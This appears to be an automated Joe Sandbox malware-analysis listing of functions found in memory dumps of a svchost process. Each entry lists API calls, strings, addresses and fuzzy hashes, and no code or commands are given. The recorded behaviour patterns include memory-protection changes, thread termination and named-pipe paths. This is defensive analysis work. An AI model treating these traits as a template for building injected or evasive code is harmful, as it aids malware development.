Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 99fceb8165095ca8fb80df3d2aae8239eeb3eeef0e8dcfb05f7a393222bd527d
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 95111B7D613740C3EB259B31E40D75AA7A0BB59B8AF048424CD496775AFF3CC50C8700

Function 00000282B8DA37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000282B8DA37C8
GetCurrentProcess.KERNEL32 ref: 00000282B8DA37D6
VirtualProtectEx.KERNEL32 ref: 00000282B8DA37F8
GetCurrentProcess.KERNEL32 ref: 00000282B8DA3819
VirtualProtectEx.KERNEL32 ref: 00000282B8DA383A
TerminateThread.KERNEL32 ref: 00000282B8DA3849

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a169cdcf6180725900e6ec04f2e15f8135653fa3f0571be0e12c4bb2a712c151
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 91111B79613782C2EB289B71E81DB16A7A4BB48BC9F14842ACA5D07B54EF3CC40C8700

Function 00000282B93490D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000282B9349103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000282B9349198
RtlUnwindEx.NTDLL ref: 00000282B93491E7

Strings

f, xrefs: 00000282B9349116
csm, xrefs: 00000282B934917E

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: a9fcac7cc40c513d21a20bdf6028b1e89b562cda55469d93e5758c3df15476eb
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 6E518D3A213604CAEB18CB35E89CB5937A5F346F8DF5AC520DA566774AEF35C849C700

Function 00000282B8DA90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000282B8DA9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000282B8DA9198
RtlUnwindEx.NTDLL ref: 00000282B8DA91E7

Strings

csm, xrefs: 00000282B8DA917E
f, xrefs: 00000282B8DA9116

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 2c04befc99158480b2c75d6bce69cda1caa0da7fa91a42e7b770b43edf50e2f7
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: F051693A613682EAEB14DB25E448B597395F344BCCFA0C5229B3A47F88EF35D849C700

Function 00000282B8DA90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000282B8DA9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000282B8DA9198
RtlUnwindEx.NTDLL ref: 00000282B8DA91E7

Strings

csm, xrefs: 00000282B8DA917E
f, xrefs: 00000282B8DA9116

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: d191c37d531235dbf7a02158afe981912d60d15f6576c2020b7afb9aabddfcef
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 4731983A203692E6E714DF21E84CB5937A5F344BCCF24C516AE6A03B88DF39C948C704

Function 00000282B9341AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000282B9341AD8
StrCmpNIW.SHLWAPI ref: 00000282B9341AF2
lstrlenW.KERNEL32 ref: 00000282B9341B01
StrCpyW.SHLWAPI ref: 00000282B9341B16

Strings

\\?\, xrefs: 00000282B9341AE6

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: ab0c6fecc8e6d3e6e6ea6155fe4d9f0d2808fdee713d30f1b12e1f86b99a697d
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: DEF04476306A41D6EB209B71F49D3596761F758B8DF84C021CA4957659FF2CC64CC700

Function 00000282B8DA1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000282B8DA1AD8
StrCmpNIW.SHLWAPI ref: 00000282B8DA1AF2
lstrlenW.KERNEL32 ref: 00000282B8DA1B01
StrCpyW.SHLWAPI ref: 00000282B8DA1B16

Strings

\\?\, xrefs: 00000282B8DA1AE6

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: db0ffa68866ef70a75210329fcc731088357e190ed795b3732f74de792fed1ce
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 51F04F76306686D2EB208B75F4D835A67A4F744BCCF84C026CA5D46D64DE3CC68CCB00

Function 00000282B9343200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000282B9343222
StrCpyW.SHLWAPI ref: 00000282B9343232
StrCatW.SHLWAPI ref: 00000282B934323E
PathCombineW.SHLWAPI ref: 00000282B934324C

Strings

\\.\pipe\, xrefs: 00000282B9343218

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 4f8e387ae748aae49105870ec44786fc6297af6833558f05d0d2f072e7062749
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 7CF08938307B40D3EA008B23F9092156310AB4CFD5F09C131DD5657B19EE2CC449C300

Function 00000282B8DA3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000282B8DA3222
StrCpyW.SHLWAPI ref: 00000282B8DA3232
StrCatW.SHLWAPI ref: 00000282B8DA323E
PathCombineW.SHLWAPI ref: 00000282B8DA324C

Strings

\\.\pipe\, xrefs: 00000282B8DA3218

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 16607f60cf77c836b640dd59762ef053dfad378f34b739d1cfd7db8d21740cca
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 39F05E38247BD2D1EA088B63B9082196361AB48FD8F48C1329E9E07F28CE3CC4498300

Function 00000282B934A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000282B934A154
GetProcAddress.KERNEL32 ref: 00000282B934A16A
FreeLibrary.KERNEL32 ref: 00000282B934A187

Strings

mscoree.dll, xrefs: 00000282B934A14B
CorExitProcess, xrefs: 00000282B934A163

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 4786efdc0144647c9b596dc0bc0b175e1f5ded4b1e50c7ef30eab13e8223b1cf
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: BEF01279313B44D2EF594B71E88C3692360EB4CB9BF49A419D50B966A6EF2CC48CC700

Function 00000282B8DAA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000282B8DAA154
GetProcAddress.KERNEL32 ref: 00000282B8DAA16A
FreeLibrary.KERNEL32 ref: 00000282B8DAA187

Strings

mscoree.dll, xrefs: 00000282B8DAA14B
CorExitProcess, xrefs: 00000282B8DAA163

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 4bbf1baefd7e483d37efb492f0633a26f3df8f9882de32063fde2b7f0884caa1
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 34F0FE79323AC6E1EF588F70E88876923A0AB48BD8F54A51B951F45A64DF38C48CD710

Function 00000282B93451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B9345236

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: e192c33b2497ddfb3b8f4467b7b6abef97caf057f2a55a0d3411df69ff7e01b1
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 4502EE3661AB80C6E760CB65F49435AB7A0F3C5789F154115EA8E97BA9EF7CC488CF00

Function 00000282B8DA51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B8DA5236

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: c74cb0181709780e029226ea13c575c18113fde037f5dd6bb55c64b566812bcc
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 8B02983A11ABC5C6EB608B65E49435AB7B1F3C5794F204116EB9E87BA8DF79C448CF00

Function 00000282B9350860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000282B93508A2
GetConsoleMode.KERNEL32 ref: 00000282B9350960
GetLastError.KERNEL32 ref: 00000282B93509EA

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 329575542b7b037c2a6f10a27fdf483dd05ab6aee7567d432f684ec240e3b3c1
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: C481CE3A613640C9FB50AB70D8887AD27A1B74AB8EF448115DE0E73797FF368849C311

Function 00000282B8DB0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000282B8DB08A2
GetConsoleMode.KERNEL32 ref: 00000282B8DB0960
GetLastError.KERNEL32 ref: 00000282B8DB09EA

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: ac986b39dd477dac9d53fab1b9d7695bb7e135cab44a2dbcc5f0ae62fb71cd68
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: D681AF3A613692C9FB50AB7588987AD27A0B744BDCF44CA17DE0E53E92DF34C84AC710

Function 00000282B93457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B9345806

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: bb8367800913808a98c22552a8ca0b195dfb65073773008396ca97126ec84294
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 2F61DD3A61BB80C6E760DB25E44831A77A4F389749F158115FA8E57BA8EF7CC448CF01

Function 00000282B8DA57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000282B8DA5806

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: d2828644c5362709f03628e236e348c017eb12a2c201817659c8e8e194e2d35c
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 21619C3A51BA81C6E7609B65E45831A77B0F388798F208116EB9D97FA4DF7CC548CF40

Function 00000282B9351EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000282B9351EE0
_set_statfp.LIBCMT ref: 00000282B9351EFB
_set_statfp.LIBCMT ref: 00000282B9351F17
_set_statfp.LIBCMT ref: 00000282B9351F53

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 8dcd0d73da239f86126cd8ccaa1711c6ab92b561c4ea5a8d70b48c99d68161c4
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: D411913AA5BA00C1F6A811B4E4BE3695340EB6D37EE05C724EA76262D7AF94DC494300

Function 00000282B8DB1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000282B8DB1EE0
_set_statfp.LIBCMT ref: 00000282B8DB1EFB
_set_statfp.LIBCMT ref: 00000282B8DB1F17
_set_statfp.LIBCMT ref: 00000282B8DB1F53

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 049caa18fc2c5deb118df8bea14c5a875bc0363861e9dbe93255141c9d6f655d
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: CC11513BA5BA93C1FA981178E45E36513416B693FCE44C627BA7E06ED68F548D4A8300

Function 00000282B8D812B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000282B8D812E0
_set_statfp.LIBCMT ref: 00000282B8D812FB
_set_statfp.LIBCMT ref: 00000282B8D81317
_set_statfp.LIBCMT ref: 00000282B8D81353

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 487b0ac85af087364b8edb82fa0e2186597b315b828db3485d3e9fcff3f211a8
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 5511943A657A93C1FE551175E45E3AD13407B64FFCE48C626AA7E06ED68E14EC4E4300

Function 00000282B9343878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000282B9343886
GetCurrentProcess.KERNEL32 ref: 00000282B93438B4
VirtualProtectEx.KERNEL32 ref: 00000282B93438D6
GetCurrentProcess.KERNEL32 ref: 00000282B93438F4
VirtualProtectEx.KERNEL32 ref: 00000282B9343915

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 67b560d21150ccc969ce9abfe89650848364a51307f6663e49a92dc5ee8f6161
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 5111183A706B40C3EB549B31E40836AA7A1FB49B89F098429DE8957795FE3DC5088700

Function 00000282B8DA3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000282B8DA3886
GetCurrentProcess.KERNEL32 ref: 00000282B8DA38B4
VirtualProtectEx.KERNEL32 ref: 00000282B8DA38D6
GetCurrentProcess.KERNEL32 ref: 00000282B8DA38F4
VirtualProtectEx.KERNEL32 ref: 00000282B8DA3915

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: d76deb8c6dd1bea5da5d165a6edf99ebc3268aa8e3329bc03f11daae423a3544
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 3911FE39707B82C2EB189B61F418759A7A5FB48BD8F14802ADE9D07B54EE3DC549C704

Function 00000282B8D784F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000282B8D78503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000282B8D78598

Strings

f, xrefs: 00000282B8D78516
csm, xrefs: 00000282B8D7857E

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: cc8c590e5018174600e090cd008aae367dfd9d2eba33cfa537e86252c8b0d5fa
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 6551983E713682DAEB169B35E848B1C3795F340BDCF51C1269A2A43B88EF34D849C709

Function 00000282B8D784D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000282B8D78503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000282B8D78598

Strings

f, xrefs: 00000282B8D78516
csm, xrefs: 00000282B8D7857E

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: f60489baf2f8e6430a02c6f5f2ec156c2c0a566cf15fb34c82f9f1790e8a906a
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 4831567A3136C2D6E7169B22E848B1937A4F740BDCF15C016AE5A07B84CF38D949C709

Function 00000282B8DA14B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000282B8DA14D5
HeapFree.KERNEL32 ref: 00000282B8DA14E4
GetProcessHeap.KERNEL32 ref: 00000282B8DA14F0
HeapFree.KERNEL32 ref: 00000282B8DA14FF
GetProcessHeap.KERNEL32 ref: 00000282B8DA152A

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: 51fc87182718c6f5c5f314d1eecbf56b8764e8642b1e6d8ebb0fa1d6a758a6cf
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 1C114F39516BC9D6EB589F6AA44831A73B4F389FC8F048026DB9E03B14DF38C0558700

Function 00000282B93426F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000282B93427D4
StrCpyW.SHLWAPI ref: 00000282B93427ED

Strings

\\.\pipe\, xrefs: 00000282B93427DF

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 5d345da19b37a545a737d39d2b42a4eaf418336b9614e7d665e038eb3594ce22
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 7671C53A213781C6EB649F35D9883AE6791F74A78DF4A8016DD4973B99EE34C90CC700

Function 00000282B8DA26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000282B8DA27D4
StrCpyW.SHLWAPI ref: 00000282B8DA27ED

Strings

\\.\pipe\, xrefs: 00000282B8DA27DF

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 6576e22716d3e014b3d38b41550769868537e6d9a71a84324eb087c55c7c4c0e
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
